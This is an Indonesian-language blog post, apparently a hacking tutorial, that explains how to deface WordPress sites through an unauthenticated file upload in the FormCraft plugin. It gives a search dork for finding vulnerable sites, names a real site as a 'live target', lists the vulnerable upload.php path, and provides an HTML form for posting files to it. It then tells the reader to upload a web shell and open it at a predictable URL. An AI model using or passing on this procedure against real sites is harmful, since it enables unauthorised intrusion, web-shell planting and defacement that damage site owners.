Sabtu, 27 Februari 2016

Deface Website Dengan Wordpress Plugins FormCraft Upload Vulnerability Sabtu, 27 Februari 2016











Dork :  inurl: "wp-content//plugins/formcraft/"

Live Target : http://quiropracticoqro.com/

Exploit :
  1. wp-content/plugins/formcraft/file-upload/server/php/upload.php
  1. wp-content/plugins/formcraft/file-upload/server/php/


Script CSRF : 
<form method="POST" action="http://www.Unknown~X.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button></form>

Simpan Dengan Format html : Save As > localhost.html 

Cari target menggunakan dork di atas , Lalu masukkan exploit yang di atas  Jika Vuln akan nampak seperti ini :

Sekarang tinggal edit targetnya di Script CSRF yang tadi .. Sekarang buka filenya dengan browser yang mastah gunakan. Lalu upload deh shell kesangannya  Setelah upload maka akan nampak seperti ini :


Shell Access : 
http://www.site.com/wp-content/plugins/formcraft/file-upload/server/php/files/namashell.php

Jika Berhasil Akan Muncul Shell Kesayangan Sobat, Tapi Jika Ga Muncul Berarti Sobat Kurang Ganteng :v


Sekian, Semoga bermanfaat



| Comment ™ |
Categorized:

Related Post

Komentar Go by: |

0 komentar :

Leave Your Comment

Langganan: Posting Komentar ( Atom )